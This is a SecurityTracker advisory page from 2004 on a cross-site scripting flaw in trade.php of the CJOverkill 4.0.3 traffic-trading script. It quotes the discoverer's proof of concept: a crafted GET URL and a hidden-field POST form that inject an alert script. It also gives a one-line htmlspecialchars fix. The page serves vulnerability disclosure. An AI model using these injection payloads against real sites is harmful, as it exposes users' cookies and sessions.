SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   CJOverkill Vendors:   cjoverkill.icefire.org
CJOverkill Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1011604
SecurityTracker URL:  http://securitytracker.com/id/1011604
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 11 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 4.0.3
Description:   An input validation vulnerability was reported in CJOverkill. A remote user can conduct cross-site scripting attacks.

aCiDBiTS reported that 'trade.php' does not validate user-supplied input to remove HTML code. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the CJOverkill software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit is provided [this requires global registers to be on]:

http://URL_to_cjoverkill_script/trade.php?tms[0]=Yes,%20there%20is%20a%20way%20;-)%3Cscript%3Ealert(String.fromCharCode(88)%2BString.fromCharCode(83)%2BStri

The vendor has been notified.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the CJOverkill software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry. The vendor is working on a fix.
Vendor URL:  cjoverkill.icefire.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Oct 12 2004 (Vendor Issues Fix) CJOverkill Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
The vendor has issued a fix.



 Source Message Contents

Subject:  [Full-Disclosure] CJOverkill 4.0.3 XSS Proof of Concept


+--------------------------------------------------------+
| CJOverkill 4.0.3 Cross Site Scripting Proof of Concept |
| By aCiDBiTS        acidbits@gmail.com      10-Oct-2004 |
+--------------------------------------------------------+
    
    [                                              ]
	[ Your web application needs a security audit? ]
    [                 Email me !                   ] 
	[                                              ]

------------
Introduction
------------

(http://cjoverkill.icefire.org/) "CJOverkill is a powerful traffic
trading script that keeps its users happy with their site's growing
traffic. Tested on high traffic sites and proven its outstanding
performance, CJOverkill's security measures prevent others from trying
to cheat you. With this script ,you can rest assured your site is in
good hands."


-------------
Vulnerability
-------------

There is no user input sanitation for some parameters in trade.php.
This can be exploited to insert html-script code that will be executed
in the user browser, allowing to a malicious attacker to steal the
user-cookie for that site. Maybe older versions also vulnerable.
Vendor has been warned, an official patch will be released.


----------------
Proof of Concept
----------------

There are two ways to XSS through trade.php:

(1.) GET. Victim should click on a link like: (needs register globals ON)

http://URL_to_cjoverkill_script/trade.php?tms[0]=Yes,%20there%20is%20a%20way%20;-)%3Cscript%3Ealert(String.fromCharCode(88)%2BString.fromCharCode(83)%2BString.fromCharCode(83));%3C/script%3E


(2.) POST. Victim should click a form's submit button with hidden fields:

<form action="http://URL_to_cjoverkill_script/trade.php"
method="post"><input name="email" type="hidden" value="fake"><input
name="add" type="hidden" value="1"><input name="url" type="hidden"
value="&lt;script&gt;alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83));&lt;/script&gt;
"><input name="" type="submit" value="Click me !"></form>


---------
Quick fix
---------

Edit trade.php, line 135:

	echo ("$tms[$i]<br>");

Modify with:

	echo (htmlspecialchars($tms[$i])."<br>");

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC